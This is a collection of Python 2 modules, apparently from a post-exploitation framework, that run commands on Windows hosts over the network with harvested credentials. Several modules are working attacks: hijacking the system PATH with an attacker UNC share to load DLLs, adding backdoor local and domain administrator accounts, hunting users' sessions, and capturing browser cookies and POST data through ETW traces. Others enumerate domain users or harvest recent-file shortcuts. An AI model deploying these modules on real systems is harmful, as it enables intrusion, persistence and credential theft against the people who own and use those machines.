def run(self): # assume single set of credentials (take the first one) username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] lhost = self.required_options["lhost"][0] for target in self.targets: existingPath, newPath = "", "" # reg.exe to get the current path pathCMD = "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path" pathResult = command_methods.executeResult(target, username, password, pathCMD, triggerMethod) # parse the PATH output parts = pathResult.split("\r\n") # check if we get a valid result if parts[1].startswith("HKEY"): regParts = parts[2].split() existingPath = " ".join(regParts[2:]) if existingPath != "": newPath = "\\\\" + lhost + "\\system\\;" + existingPath else: print helpers.color(" [!] Error: No path found\n", warning=True) regCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \"" + newPath + "\"" regResult = command_methods.executeResult(target, username, password, regCMD, triggerMethod) if regResult == "": self.output += "[!] No result file, reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "The operation completed successfully." in regResult: self.output += "[*] reg PATH successfully set with \\\\" + lhost + "\\system using creds '" + username + ":" + password + "' on : " + target + "\n" # add in our cleanup command to restore the original PATH cleanupCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \"" + existingPath + "\"" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n" # allow \\UNC loading in %PATH% :) regCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 0" regResult2 = command_methods.executeResult( target, username, password, regCMD2, triggerMethod) self.output += "[*] reg command to allow UNC loading successfully set using creds '" + username + ":" + password + "' on : " + target + "\n" # cleanup -> make everything more secure by disable UNC/SMB loading cleanupCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 2" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD2 + "|" + triggerMethod + "\n" else: self.output += "[!] reg PATH set failed using creds '" + username + ":" + password + "' on : " + target + "\n" # print a message if command succeeded on at least one box if self.output != "": self.output += "[*] run ./tools/dll_monitor.py to monitor for .dll hijacking"
def run(self): # assume single set of credentials username, password = self.creds[0] group = self.required_options["group"][0] triggerMethod = "winexe" for target in self.targets: targetUsernames = [] # reg.exe command to query the domain group # we want to do this on each box so we can operate across domains! command = "net group \"%s\" /domain" % (group) result = command_methods.executeResult(target, username, password, command, triggerMethod) # TODO: sanity check that we get a correct file back? # find the ---------- marker, get the bottom half, split by newline # and extract just the name fields nameParts = result[result.find("-----"):].split("\r\n")[1:-3] for part in nameParts: targetUsernames.extend(part.lower().split()) # check the task list on the host taskListResult = command_methods.executeResult( target, username, password, "tasklist /V /FO CSV", triggerMethod) # check the sessions list on the host sessionsResult = command_methods.executeResult( target, username, password, "qwinsta", triggerMethod) print "" # for each username in our target list, see if they show up in the queried results for u in targetUsernames: if u.lower() in taskListResult.lower(): self.output += "[*] User '%s\\%s' has a process on %s\n" % ( group, u, target) print helpers.color( "\n [*] User '%s\\%s' has a process on %s!" % (group, u, target)) time.sleep(1) if u.lower() in sessionsResult.lower(): self.output += "[*] User '%s\\%s' has a session on %s\n" % ( group, u, target) print helpers.color( " [*] User '%s\\%s' has a session on %s!" % (group, u, target)) time.sleep(1) # if we have no results, add message to the output if self.output == "": self.output = "[!] No users found\n"
def run(self): # assume single set of credentials (take the first one) username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] lhost = self.required_options["lhost"][0] for target in self.targets: existingPath, newPath = "", "" # reg.exe to get the current path pathCMD = "reg query \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path" pathResult = command_methods.executeResult(target, username, password, pathCMD, triggerMethod) # parse the PATH output parts = pathResult.split("\r\n") # check if we get a valid result if parts[1].startswith("HKEY"): regParts = parts[2].split() existingPath = " ".join(regParts[2:]) if existingPath != "": newPath = "\\\\"+lhost+"\\system\\;"+existingPath else: print helpers.color(" [!] Error: No path found\n", warning=True) regCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \""+newPath+"\"" regResult = command_methods.executeResult(target, username, password, regCMD, triggerMethod) if regResult == "": self.output += "[!] No result file, reg PATH set failed using creds '"+username+":"+password+"' on : " + target + "\n" elif "The operation completed successfully." in regResult: self.output += "[*] reg PATH successfully set with \\\\"+lhost+"\\system using creds '"+username+":"+password+"' on : " + target + "\n" # add in our cleanup command to restore the original PATH cleanupCMD = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /v Path /t REG_EXPAND_SZ /f /d \""+existingPath+"\"" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n" # allow \\UNC loading in %PATH% :) regCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 0" regResult2 = command_methods.executeResult(target, username, password, regCMD2, triggerMethod) self.output += "[*] reg command to allow UNC loading successfully set using creds '"+username+":"+password+"' on : " + target + "\n" # cleanup -> make everything more secure by disable UNC/SMB loading cleanupCMD2 = "REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" /v CWDIllegalInDllSearch /t REG_DWORD /f /d 2" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD2+"|"+triggerMethod+"\n" else: self.output += "[!] reg PATH set failed using creds '"+username+":"+password+"' on : " + target + "\n" # print a message if command succeeded on at least one box if self.output != "": self.output += "[*] run ./tools/dll_monitor.py to monitor for .dll hijacking"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: userToAdd = self.required_options["user"][0] passToAdd = self.required_options["pass"][0] groupToAdd = self.required_options["group"][0] # command to add the user:password to the machine userAddCommand = "net user " + userToAdd + " " + passToAdd + " /add" # command to add the user to the specified localgroup groupAddCommand = "net localgroup " + groupToAdd + " " + userToAdd + " /add" # execute the user add command and get the result userAddResult = command_methods.executeResult( target, username, password, userAddCommand, triggerMethod) # check all of our results as appropriate if userAddResult == "": self.output += "[!] No result file, user add '" + userToAdd + ":" + passToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "The command completed successfully" in userAddResult: self.output += "[*] User '" + userToAdd + ":" + passToAdd + "' successfully added using creds '" + username + ":" + password + "' on " + target + "\n" # cleanup -> delete the user from the system cleanupCMD = "net user " + userToAdd + " /delete" self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n" # if the user add command succeeded, continue to the group add groupAddResult = command_methods.executeResult( target, username, password, groupAddCommand, triggerMethod) if groupAddResult == "": self.output += "[!] No result file, user add of user '" + userToAdd + "' to localgroup '" + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "The command completed successfully" in groupAddResult: self.output += "[*] User '" + userToAdd + "' successfully added to localgroup '" + groupToAdd + "' using creds '" + username + ":" + password + "' on " + target + "\n" else: self.output += "[!] User add '" + userToAdd + "' to localgroup '" + groupToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n" else: self.output += "[!] User add '" + userToAdd + ":" + passToAdd + "' failed using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] group = self.required_options["group"][0] triggerMethod = "winexe" for target in self.targets: targetUsernames = [] # reg.exe command to query the domain group # we want to do this on each box so we can operate across domains! command = "net group \"%s\" /domain" %( group ) result = command_methods.executeResult(target, username, password, command, triggerMethod) # TODO: sanity check that we get a correct file back? # find the ---------- marker, get the bottom half, split by newline # and extract just the name fields nameParts = result[result.find("-----"):].split("\r\n")[1:-3] for part in nameParts: targetUsernames.extend(part.lower().split()) # check the task list on the host taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod) # check the sessions list on the host sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod) print "" # for each username in our target list, see if they show up in the queried results for u in targetUsernames: if u.lower() in taskListResult.lower(): self.output += "[*] User '%s\\%s' has a process on %s\n" %(group, u, target) print helpers.color("\n [*] User '%s\\%s' has a process on %s!" %(group, u, target)) time.sleep(1) if u.lower() in sessionsResult.lower(): self.output += "[*] User '%s\\%s' has a session on %s\n" %(group, u, target) print helpers.color(" [*] User '%s\\%s' has a session on %s!" %(group, u, target)) time.sleep(1) # if we have no results, add message to the output if self.output == "": self.output = "[!] No users found\n"
def run(self): # assume single set of credentials username, password = self.creds[0] trigger_method = "wmis" for target in self.targets: # reg.exe command to query the domain group command = "whoami /user" result = command_methods.executeResult(target, username, password, command, trigger_method) if result == "": self.output += "[!] No result file, query for domain sid '" + group + "'' failed on " + target + "\n" else: sid = "" for line in result.split("\n"): if "S-" in line: user, sid_full = line.split() # extract the domain sid from the results sid = "-".join(sid_full.split("-")[:-1]) print helpers.color("\n\n [*] Domain sid: " + sid) time.sleep(2) self.output += "[*] Domain sid extracted using creds '" + username + ":" + password + "' on " + target + ": " + sid + "\n" if sid == "": self.output += "[!] Couldn't extract domain sid from results using creds '" + username + ":" + password + "' on " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg.exe command to detect if powershell is installed command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install" result = command_methods.executeResult(target, username, password, command, triggerMethod) if result.startswith("error:"): self.output += "[!] Error '" + result + "' in detecting powershell using creds '" + username + ":" + password + "' on : " + target + "\n" elif result == "": self.output += "[!] No result file, detect PowerShell failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "0x1" in result: self.output += "[*] PowerShell detected using creds '" + username + ":" + password + "' on : " + target + "\n" elif "0x0" in result: self.output += "[*] PowerShell not detected using creds '" + username + ":" + password + "' on : " + target + "\n" else: print "result:", result self.output += "[!] Error in detecting PowerShell using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # command to invoke finddllhijack and output it to a temporary file exePath = settings.VEIL_PILLAGE_PATH+"/data/misc/finddllhijack.exe" cmd = "C:\\Windows\\Temp\\finddllhijack.exe" for target in self.targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath) # execute finddllhijack and get the results out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5) # cleanup command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out) if out != "": self.output += "[*] FindDllHijack results for "+target+" stored at "+saveFile+"\n" else: self.output += "[!] FindDllHijack failed for "+target+" : no result file\n"
def run(self): # assume single set of credentials username, password = self.creds[0] trigger_method = "wmis" for target in self.targets: # reg.exe command to query the domain group command = "whoami /user" result = command_methods.executeResult(target, username, password, command, trigger_method) if result == "": self.output += "[!] No result file, query for domain sid '"+group+"'' failed on " + target + "\n" else: sid = "" for line in result.split("\n"): if "S-" in line: user,sid_full = line.split() # extract the domain sid from the results sid = "-".join(sid_full.split("-")[:-1]) print helpers.color("\n\n [*] Domain sid: "+sid) time.sleep(2) self.output += "[*] Domain sid extracted using creds '"+username+":"+password+"' on " + target + ": "+sid+"\n" if sid == "": self.output += "[!] Couldn't extract domain sid from results using creds '"+username+":"+password+"' on " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: userToAdd = self.required_options["user"][0] passToAdd = self.required_options["pass"][0] groupToAdd = self.required_options["group"][0] # command to add the user:password to the machine userAddCommand = "net user "+userToAdd+" "+passToAdd+" /add /domain" # command to add the user to the specified domain group groupAddCommand = "net group "+groupToAdd+" "+userToAdd+" /add /domain" # execute the user add command and get the result userAddResult = command_methods.executeResult(target, username, password, userAddCommand, triggerMethod) # check all of our results as appropriate if userAddResult == "": self.output += "[!] No result file, domain user add '"+userToAdd+":"+passToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n" elif "The command completed successfully" in userAddResult: self.output += "[*] Domain user '"+userToAdd+":"+passToAdd+"' successfully added using creds '"+username+":"+password+"' on " + target + "\n" # cleanup -> delete the user from the domain cleanupCMD = "net user "+userToAdd+" /delete /domain" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n" # if the user add command succeeded, continue to the group add groupAddResult = command_methods.executeResult(target, username, password, groupAddCommand, triggerMethod) if groupAddResult == "": self.output += "[!] No result file, domain user add of user '"+userToAdd+"' to group '"+groupToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n" elif "The command completed successfully" in groupAddResult: self.output += "[*] Domain user '"+userToAdd+"' successfully added to group '"+groupToAdd+"' using creds '"+username+":"+password+"' on " + target + "\n" else: self.output += "[!] Domain user add '"+userToAdd+"' to group '"+groupToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n" else: self.output += "[!] Domain user add '"+userToAdd+":"+passToAdd+"' failed using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] targetUsernames = [] # if we're passed a file, read in the usernames if os.path.exists(self.required_options["user"][0]): f = open(self.required_options["user"][0]) lines = f.readlines() f.close() for line in lines: targetUsernames.append(line.strip()) # if we have just a single name, use just that else: targetUsernames.append(self.required_options["user"][0]) for target in self.targets: # check the task list on the host taskListResult = command_methods.executeResult( target, username, password, "tasklist /V /FO CSV", triggerMethod) # check the sessions list on the host sessionsResult = command_methods.executeResult( target, username, password, "qwinsta", triggerMethod) # for each username in our target list, see if they show up in the queried results for u in targetUsernames: if u.lower() in taskListResult.lower(): self.output += "[*] User '%s' has process on %s\n" % ( u, target) if u.lower() in sessionsResult.lower(): self.output += "[*] User '%s' has session on %s\n" % ( u, target) # if we have no results, add message to the output if self.output == "": self.output = "[!] No users found\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] targetUsernames = [] # if we're passed a file, read in the usernames if os.path.exists(self.required_options["user"][0]): f = open(self.required_options["user"][0]) lines = f.readlines() f.close() for line in lines: targetUsernames.append(line.strip()) # if we have just a single name, use just that else: targetUsernames.append(self.required_options["user"][0]) for target in self.targets: # check the task list on the host taskListResult = command_methods.executeResult(target, username, password, "tasklist /V /FO CSV", triggerMethod) # check the sessions list on the host sessionsResult = command_methods.executeResult(target, username, password, "qwinsta", triggerMethod) # for each username in our target list, see if they show up in the queried results for u in targetUsernames: if u.lower() in taskListResult.lower(): self.output += "[*] User '%s' has process on %s\n" %(u, target) if u.lower() in sessionsResult.lower(): self.output += "[*] User '%s' has session on %s\n" %(u, target) # if we have no results, add message to the output if self.output == "": self.output = "[!] No users found\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] command = self.required_options["command"][0] for target in self.targets: result = command_methods.executeResult(target, username, password, command, triggerMethod) if result != "": self.output += "[*] Results for '"+command+"' using creds '"+username+":"+password+"' on "+target+" : \n" self.output += result self.output += "\n\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] flag = self.required_options["flag"][0] for target in self.targets: # stop the ETW stopCMD = "logman stop Status32 -ets" command_methods.executeCommand(target, username, password, stopCMD, triggerMethod) # search for cookies or POST paramters if flag.lower() == "post": flag = "POST" moduleFile = "post_params.txt" else: flag = "cookie added" moduleFile = "cookies.txt" # check the ETW results for the specified flag, and delete the dump file parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \"" + flag + "\"" # wait 20 seconds for everything to parse...if errors happen, increase this parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20) # delete the trace file delCmd = "del C:\\Windows\\Temp\\status32.etl" command_methods.executeCommand(target, username, password, delCmd, triggerMethod) if parseResult == "": self.output += "[!] No ETW results for " + flag + " using creds '" + username + ":" + password + "' on : " + target + "\n" else: # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult) self.output += "[*] ETW results for " + flag + " using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = "winexe" for target in self.targets: # net command to query the domain group command = "net users /domain" result = command_methods.executeResult(target, username, password, command, triggerMethod) if result == "": self.output += "[!] No result file, query for domain user failed using creds '"+username+":"+password+"' on " + target + "\n" else: self.output += "[!] Query for domain users sucessful on " + target + ":\n" self.output += result + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = "winexe" for target in self.targets: # net command to query the domain group command = "net users /domain" result = command_methods.executeResult(target, username, password, command, triggerMethod) if result == "": self.output += "[!] No result file, query for domain user failed using creds '" + username + ":" + password + "' on " + target + "\n" else: self.output += "[!] Query for domain users sucessful on " + target + ":\n" self.output += result + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # kill all powershell processes killCMD = "taskkill /f /im powershell.exe" for target in self.targets: # execute the command on the host and get the output out = command_methods.executeResult(target, username, password, killCMD, triggerMethod=triggerMethod) if "SUCCESS" in out: self.output += "[*] Powershell processes terminated using creds '"+username+":"+password+"' on "+target+"\n" else: self.output += "[*] Powershell processes failed to terminate using creds '"+username+":"+password+"' on "+target+"\n"
def run(self): # assume single set of credentials (take the first one) username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # disable RDP command rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f" # execute the RDP enable command and get the result rdpResult = command_methods.executeResult(target, username, password, rdpCMD,triggerMethod) if rdpResult == "": self.output += "[!] No result file, RDP disable failed using creds '"+username+":"+password+"' on : " + target + "\n" elif "The operation completed successfully" in rdpResult: self.output += "[*] RDP successfully disabled using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg.exe command to enable UAC command = "reg ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f" result = command_methods.executeResult(target, username, password, command, triggerMethod) if result == "": self.output += "[!] No result file, UAC enable failed using creds '"+username+":"+password+"' on : " + target + "\n" elif "The operation completed successfully" in result: self.output += "[*] UAC successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n" else: self.output += "[!] Error in enabling UAC using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg_command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install" # but we don't actually care usually if it's installed, just if it's functionality # so let's just invoke it yo' command = "powershell.exe -c \"$a=42;$a\"" result = command_methods.executeResult(target, username, password, command, triggerMethod) if result.strip() == "42": self.output += "[*] Powershell detected as functional using creds '"+username+":"+password+"' on : " + target + "\n" else: self.output += "[!] Powershell not detected as functional using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self): # assume single set of credentials (take the first one) username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # the registry command to disable the sethc stickkeys backdoor disableSethcCommand = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f" # execute the sethc command and get the result disableResult = command_methods.executeResult(target, username, password, disableSethcCommand, triggerMethod) if disableResult == "": self.output += "[!] No result file, SETHC backdoor disable failed using creds '"+username+":"+password+"' on : " + target + "\n" elif "The operation completed successfully" in disableResult: self.output += "[*] SETHC backdoor successfully disabled using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] trigger_method = self.required_options["trigger_method"][0] for target in self.targets: command = "echo %USERPROFILE%" user_profile = command_methods.executeResult(target, username, password, command, trigger_method) if user_profile == '': self.output += " [!] No result file querying env variables using creds " + username + ":" + password + " on: " + target + "\n" else: user_profile = user_profile.strip(" \r\n") recent_path1 = user_profile + "\\Recent" recent_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Windows\\Recent" office_path1 = user_profile + "\\Application Data\\Microsoft\\Office\\Recent" office_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Office\\Recent" self.output += " [*] Enumerating recent files on %s \n" % target for path in [recent_path1, recent_path2, office_path1, office_path2]: files = smb.ls(target, username, password, path, path_error=False) if len(files) > 0: self.output += " [*] Found %s files \n" % len(files) for file in files: if file[-3:] == "lnk": out = smb.getFile(target, username, password, path + "\\" + file, delete=False) if out == '': self.output += " [!] Failed retrieving : %s \n" % file else: save_path = helpers.saveModuleFile(self, target, file, out) self.output += " [*] .lnk file %s saved from %s to %s\n" % (file,path,save_path) try: # parsed_lnk = str(pylnk.parse(save_path)).decode('cp1252') parsed_lnk = pylnker.parse_lnk(save_path) details_path = helpers.saveModuleFile(self, target, file + '_details', parsed_lnk) self.output += " [*] .lnk file %s parsed and saved to %s\n" % (save_path,details_path) except: self.output += " [!] Error while parsing : %s \n" % save_path
def run(self): # assume single set of credentials username, password = self.creds[0] group = self.required_options["group"][0] triggerMethod = "winexe" for target in self.targets: # net command to query the domain group command = "net group \"%s\" /domain" %( group ) result = command_methods.executeResult(target, username, password, command, triggerMethod) if result == "": self.output += "[!] No result file, query for domain group '"+group+"'' failed using creds '"+username+":"+password+"' on " + target + "\n" else: self.output += "[*] Query for domain group '"+group+"'' sucessful using creds '"+username+":"+password+"' on " + target + ":\n" self.output += result + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg_command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install" # but we don't actually care usually if it's installed, just if it's functionality # so let's just invoke it yo' command = "powershell.exe -c \"$a=42;$a\"" result = command_methods.executeResult(target, username, password, command, triggerMethod) if result.strip() == "42": self.output += "[*] Powershell detected as functional using creds '" + username + ":" + password + "' on : " + target + "\n" else: self.output += "[!] Powershell not detected as functional using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self): # assume single set of credentials (take the first one) username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # the registry command to disable the sethc stickkeys backdoor disableSethcCommand = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f" # execute the sethc command and get the result disableResult = command_methods.executeResult( target, username, password, disableSethcCommand, triggerMethod) if disableResult == "": self.output += "[!] No result file, SETHC backdoor disable failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "The operation completed successfully" in disableResult: self.output += "[*] SETHC backdoor successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # command to start Event Tracing for Windows on the target for WinInit (IE) cmd = "logman start Status32 -p Microsoft-Windows-WinInet -o C:\\Windows\\Temp\\status32.etl -ets" etwResult = command_methods.executeResult(target, username, password, cmd, triggerMethod) if etwResult == "": self.output += "[!] ETW unsuccessfully started using creds '"+username+":"+password+"' on : " + target + ", no result file\n" elif "The command completed successfully." in etwResult: self.output += "[*] ETW started using creds '"+username+":"+password+"' on "+target+"\n" else: self.output += "[!] ETW unsuccessfully started using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self): # assume single set of credentials (take the first one) username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # disable RDP command rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f" # execute the RDP enable command and get the result rdpResult = command_methods.executeResult(target, username, password, rdpCMD, triggerMethod) if rdpResult == "": self.output += "[!] No result file, RDP disable failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "The operation completed successfully" in rdpResult: self.output += "[*] RDP successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self): # assume single set of credentials for this module username, password = self.creds[0] for target in self.targets: print " [*] Doing something on %s" %(target) command = "something to do on the host" # ... result = command_methods.executeResult(target, username, password, command, self.required_options["trigger_method"][0]) # check our output and write output/cleanup as appropriate if "something" in result: self.output += "action successful on " + target + "\n" # this needs to be tab-separated, check a module for examples self.cleanup += "cleanup command " + target + "\n" # finally return our putput and cleanup text return (self.output, self.cleanup)
def run(self): # assume single set of credentials username, password = self.creds[0] group = self.required_options["group"][0] triggerMethod = "winexe" for target in self.targets: # net command to query the domain group command = "net group \"%s\" /domain" % (group) result = command_methods.executeResult(target, username, password, command, triggerMethod) if result == "": self.output += "[!] No result file, query for domain group '" + group + "'' failed using creds '" + username + ":" + password + "' on " + target + "\n" else: self.output += "[*] Query for domain group '" + group + "'' sucessful using creds '" + username + ":" + password + "' on " + target + ":\n" self.output += result + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg.exe command to disable UAC command = "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA" result = command_methods.executeResult(target, username, password, command, triggerMethod) if result == "": self.output += "[!] No result file, check UAC failed using creds '"+username+":"+password+"' on : " + target + "\n" elif "0x1" in result: self.output += "[*] UAC enabled using creds '"+username+":"+password+"' on : " + target + "\n" elif "0x0" in result: self.output += "[*] UAC disabled using creds '"+username+":"+password+"' on : " + target + "\n" else: self.output += "[!] Error in checking UAC using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # reg.exe command to disable UAC command = "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA" result = command_methods.executeResult(target, username, password, command, triggerMethod) if result == "": self.output += "[!] No result file, check UAC failed using creds '" + username + ":" + password + "' on : " + target + "\n" elif "0x1" in result: self.output += "[*] UAC enabled using creds '" + username + ":" + password + "' on : " + target + "\n" elif "0x0" in result: self.output += "[*] UAC disabled using creds '" + username + ":" + password + "' on : " + target + "\n" else: self.output += "[!] Error in checking UAC using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] for target in self.targets: # command to start Event Tracing for Windows on the target for WinInit (IE) cmd = "logman start Status32 -p Microsoft-Windows-WinInet -o C:\\Windows\\Temp\\status32.etl -ets" etwResult = command_methods.executeResult(target, username, password, cmd, triggerMethod) if etwResult == "": self.output += "[!] ETW unsuccessfully started using creds '" + username + ":" + password + "' on : " + target + ", no result file\n" elif "The command completed successfully." in etwResult: self.output += "[*] ETW started using creds '" + username + ":" + password + "' on " + target + "\n" else: self.output += "[!] ETW unsuccessfully started using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] flag = self.required_options["flag"][0] for target in self.targets: # stop the ETW stopCMD = "logman stop Status32 -ets" command_methods.executeCommand(target, username, password, stopCMD, triggerMethod) # search for cookies or POST paramters if flag.lower() == "post": flag = "POST" moduleFile = "post_params.txt" else: flag = "cookie added" moduleFile = "cookies.txt" # check the ETW results for the specified flag, and delete the dump file parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\"" # wait 20 seconds for everything to parse...if errors happen, increase this parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20) # delete the trace file delCmd = "del C:\\Windows\\Temp\\status32.etl" command_methods.executeCommand(target, username, password, delCmd, triggerMethod) if parseResult == "": self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n" else: # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult) self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
def run(self): # assume single set of credentials username, password = self.creds[0] triggerMethod = self.required_options["trigger_method"][0] # command to invoke finddllhijack and output it to a temporary file exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe" cmd = "C:\\Windows\\Temp\\finddllhijack.exe" for target in self.targets: # upload the binary to the host at C:\Windows\Temp\ smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath) # execute finddllhijack and get the results out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5) # cleanup command_methods.executeCommand( target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod) # save the file off to the appropriate location saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out) if out != "": self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n" else: self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
